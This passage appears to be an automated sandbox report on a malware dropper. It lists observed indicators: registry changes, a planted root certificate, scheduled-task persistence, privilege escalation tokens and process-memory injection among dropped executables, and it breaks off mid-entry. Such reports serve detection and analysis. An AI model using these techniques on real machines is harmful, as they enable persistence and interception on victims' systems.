powershell.EXEOfficeClickToRun.exesvchost.exespoolsv.exedescription ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\72-45-41-80-d4-fb svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\72-45-41-80-d4-fb\WpadDecision = "0" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\72-45-41-80-d4-fb\WpadDecisionReason = "1" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Printers\DevModePerUser spoolsv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Set value (data) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\72-45-41-80-d4-fb\WpadDecisionTime = 84dd76e62f41db01 svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Printers\ConvertUserDevModesCount spoolsv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE -
Modifies registry class 37 IoCs
Processes:
Guide2018.exexrmcsj.exeExplorer.EXEWScript.exedescription ioc Process Key created \Registry\User\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\NotificationData Guide2018.exe Set value (int) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" Guide2018.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings Guide2018.exe Set value (data) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 Guide2018.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Guide2018.exe Set value (data) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff Guide2018.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell Guide2018.exe Set value (data) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 Guide2018.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 Guide2018.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 Guide2018.exe Set value (str) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" Guide2018.exe Set value (int) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257" Guide2018.exe Set value (str) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" Guide2018.exe Set value (data) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots Guide2018.exe Set value (int) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" Guide2018.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell Guide2018.exe Set value (int) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" Guide2018.exe Set value (int) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" Guide2018.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings xrmcsj.exe Set value (data) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff Guide2018.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656} Guide2018.exe Set value (data) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 Guide2018.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU Guide2018.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 Guide2018.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags Guide2018.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Guide2018.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg Guide2018.exe Set value (int) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1" Guide2018.exe Set value (data) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 Guide2018.exe Set value (data) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff Guide2018.exe Set value (data) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000 Guide2018.exe Set value (data) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff Guide2018.exe Set value (int) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" Guide2018.exe Set value (int) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1" Guide2018.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ WScript.exe Set value (int) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" Guide2018.exe -
Processes:
kiyan.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 kiyan.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 kiyan.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid Process 356 schtasks.exe 1884 schtasks.exe 988 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
wnxddd.exepid Process 2232 wnxddd.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
RedSystem.exepowershell.exeUpdater.vbs.exe1109125257.exepowershell.exeClient.exe2066210983.exepowershell.exeRuntime Broker.exewinupsecvmgr.exepowershell.exepid Process 432 RedSystem.exe 432 RedSystem.exe 432 RedSystem.exe 432 RedSystem.exe 432 RedSystem.exe 432 RedSystem.exe 2324 powershell.exe 2324 powershell.exe 1108 Updater.vbs.exe 1108 Updater.vbs.exe 1708 1109125257.exe 1708 1109125257.exe 5096 powershell.exe 5096 powershell.exe 3996 Client.exe 3996 Client.exe 3996 Client.exe 3996 Client.exe 3996 Client.exe 3996 Client.exe 3996 Client.exe 3996 Client.exe 3996 Client.exe 3996 Client.exe 3996 Client.exe 3996 Client.exe 3996 Client.exe 3996 Client.exe 3996 Client.exe 3996 Client.exe 3996 Client.exe 3996 Client.exe 3996 Client.exe 3996 Client.exe 1108 Updater.vbs.exe 1108 Updater.vbs.exe 4744 2066210983.exe 4744 2066210983.exe 5072 powershell.exe 5072 powershell.exe 4744 2066210983.exe 4744 2066210983.exe 464 Runtime Broker.exe 464 Runtime Broker.exe 464 Runtime Broker.exe 464 Runtime Broker.exe 464 Runtime Broker.exe 464 Runtime Broker.exe 464 Runtime Broker.exe 464 Runtime Broker.exe 464 Runtime Broker.exe 464 Runtime Broker.exe 464 Runtime Broker.exe 464 Runtime Broker.exe 464 Runtime Broker.exe 464 Runtime Broker.exe 464 Runtime Broker.exe 464 Runtime Broker.exe 464 Runtime Broker.exe 464 Runtime Broker.exe 4412 winupsecvmgr.exe 4412 winupsecvmgr.exe 3532 powershell.exe 3532 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Runtime Broker.exepid Process 464 Runtime Broker.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
cluton.exepid Process 2532 cluton.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
Processes:
msedge.exepid Process 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe 1868 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
4363463463464363463463463.exeOneDrive.exepowershell.exewnxddd.exeOneDrive.exeUpdater.vbs.exe1109125257.exepowershell.exeClient.exeOneDrive.exesvchost.exepowershell.exedescription pid Process Token: SeDebugPrivilege 4988 4363463463464363463463463.exe Token: SeDebugPrivilege 2204 OneDrive.exe Token: SeDebugPrivilege 2324 powershell.exe Token: SeDebugPrivilege 2204 OneDrive.exe Token: SeDebugPrivilege 2204 OneDrive.exe Token: SeDebugPrivilege 2232 wnxddd.exe Token: SeDebugPrivilege 2232 wnxddd.exe Token: SeDebugPrivilege 3140 OneDrive.exe Token: SeDebugPrivilege 1108 Updater.vbs.exe Token: SeDebugPrivilege 1708 1109125257.exe Token: SeDebugPrivilege 5096 powershell.exe Token: SeDebugPrivilege 3996 Client.exe Token: SeDebugPrivilege 3996 Client.exe Token: SeDebugPrivilege 1108 Updater.vbs.exe Token: SeDebugPrivilege 3640 OneDrive.exe Token: SeDebugPrivilege 3932 svchost.exe Token: SeDebugPrivilege 3932 svchost.exe Token: SeDebugPrivilege 5072 powershell.exe Token: SeIncreaseQuotaPrivilege 5072 powershell.exe Token: SeSecurityPrivilege 5072 powershell.exe Token: SeTakeOwnershipPrivilege 5072 powershell.exe Token: SeLoadDriverPrivilege 5072 powershell.exe Token: SeSystemProfilePrivilege 5072 powershell.exe Token: SeSystemtimePrivilege 5072 powershell.exe Token: SeProfSingleProcessPrivilege 5072 powershell.exe Token: SeIncBasePriorityPrivilege 5072 powershell.exe Token: SeCreatePagefilePrivilege 5072 powershell.exe Token: SeBackupPrivilege 5072 powershell.exe Token: SeRestorePrivilege 5072 powershell.exe Token: SeShutdownPrivilege 5072 powershell.exe Token: SeDebugPrivilege 5072 powershell.exe Token: SeSystemEnvironmentPrivilege 5072 powershell.exe Token: SeRemoteShutdownPrivilege 5072 powershell.exe Token: SeUndockPrivilege 5072 powershell.exe Token: SeManageVolumePrivilege 5072 powershell.exe Token: 33 5072 powershell.exe Token: 34 5072 powershell.exe Token: 35 5072 powershell.exe Token: 36 5072 powershell.exe Token: SeIncreaseQuotaPrivilege 5072 powershell.exe Token: SeSecurityPrivilege 5072 powershell.exe Token: SeTakeOwnershipPrivilege 5072 powershell.exe Token: SeLoadDriverPrivilege 5072 powershell.exe Token: SeSystemProfilePrivilege 5072 powershell.exe Token: SeSystemtimePrivilege 5072 powershell.exe Token: SeProfSingleProcessPrivilege 5072 powershell.exe Token: SeIncBasePriorityPrivilege 5072 powershell.exe Token: SeCreatePagefilePrivilege 5072 powershell.exe Token: SeBackupPrivilege 5072 powershell.exe Token: SeRestorePrivilege 5072 powershell.exe Token: SeShutdownPrivilege 5072 powershell.exe Token: SeDebugPrivilege 5072 powershell.exe Token: SeSystemEnvironmentPrivilege 5072 powershell.exe Token: SeRemoteShutdownPrivilege 5072 powershell.exe Token: SeUndockPrivilege 5072 powershell.exe Token: SeManageVolumePrivilege 5072 powershell.exe Token: 33 5072 powershell.exe Token: 34 5072 powershell.exe Token: 35 5072 powershell.exe Token: 36 5072 powershell.exe Token: SeIncreaseQuotaPrivilege 5072 powershell.exe Token: SeSecurityPrivilege 5072 powershell.exe Token: SeTakeOwnershipPrivilege 5072 powershell.exe Token: SeLoadDriverPrivilege 5072 powershell.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
dwm.exepid Process 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
dwm.exepid Process 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe 1492 dwm.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
ktyhpldea.exetstory.exeGuide2018.exepid Process 6364 ktyhpldea.exe 4520 tstory.exe 4104 Guide2018.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
4363463463464363463463463.exesvhosts.exeOneDrive.exewnxddd.exetdrpl.exexrmcsj.exeWScript.exesysnldcvmr.exe1109125257.execmd.execmd.exedescription pid Process procid_target PID 4988 wrote to memory of 432 4988 4363463463464363463463463.exe 78 PID 4988 wrote to memory of 432 4988 4363463463464363463463463.exe 78 PID 4988 wrote to memory of 432 4988 4363463463464363463463463.exe 78 PID 4988 wrote to memory of 2876 4988 4363463463464363463463463.exe 79 PID 4988 wrote to memory of 2876 4988 4363463463464363463463463.exe 79 PID 4988 wrote to memory of 664 4988 4363463463464363463463463.exe 80 PID 4988 wrote to memory of 664 4988 4363463463464363463463463.exe 80 PID 4988 wrote to memory of 664 4988 4363463463464363463463463.exe 80 PID 664 wrote to memory of 336 664 svhosts.exe 82 PID 664 wrote to memory of 336 664 svhosts.exe 82 PID 664 wrote to memory of 336 664 svhosts.exe 82 PID 664 wrote to memory of 336 664 svhosts.exe 82 PID 664 wrote to memory of 336 664 svhosts.exe 82 PID 664 wrote to memory of 336 664 svhosts.exe 82 PID 664 wrote to memory of 336 664 svhosts.exe 82 PID 664 wrote to memory of 336 664 svhosts.exe 82 PID 664 wrote to memory of 336 664 svhosts.exe 82 PID 664 wrote to memory of 336 664 svhosts.exe 82 PID 4988 wrote to memory of 2204 4988 4363463463464363463463463.exe 83 PID 4988 wrote to memory of 2204 4988 4363463463464363463463463.exe 83 PID 2204 wrote to memory of 2324 2204 OneDrive.exe 89 PID 2204 wrote to memory of 2324 2204 OneDrive.exe 89 PID 4988 wrote to memory of 2808 4988 4363463463464363463463463.exe 91 PID 4988 wrote to memory of 2808 4988 4363463463464363463463463.exe 91 PID 4988 wrote to memory of 4624 4988 4363463463464363463463463.exe 92 PID 4988 wrote to memory of 4624 4988 4363463463464363463463463.exe 92 PID 2204 wrote to memory of 2232 2204 OneDrive.exe 94 PID 2204 wrote to memory of 2232 2204 OneDrive.exe 94 PID 2232 wrote to memory of 356 2232 wnxddd.exe 95 PID 2232 wrote to memory of 356 2232 wnxddd.exe 95 PID 4988 wrote to memory of 3076 4988 4363463463464363463463463.exe 97 PID 4988 wrote to memory of 3076 4988 4363463463464363463463463.exe 97 PID 4988 wrote to memory of 3076 4988 4363463463464363463463463.exe 97 PID 3076 wrote to memory of 3160 3076 tdrpl.exe 98 PID 3076 wrote to memory of 3160 3076 tdrpl.exe 98 PID 3076 wrote to memory of 3160 3076 tdrpl.exe 98 PID 2204 wrote to memory of 4948 2204 OneDrive.exe 99 PID 2204 wrote to memory of 4948 2204 OneDrive.exe 99 PID 4948 wrote to memory of 4828 4948 xrmcsj.exe 100 PID 4948 wrote to memory of 4828 4948 xrmcsj.exe 100 PID 4948 wrote to memory of 3140 4948 xrmcsj.exe 101 PID 4948 wrote to memory of 3140 4948 xrmcsj.exe 101 PID 4828 wrote to memory of 1108 4828 WScript.exe 104 PID 4828 wrote to memory of 1108 4828 WScript.exe 104 PID 3160 wrote to memory of 1708 3160 sysnldcvmr.exe 106 PID 3160 wrote to 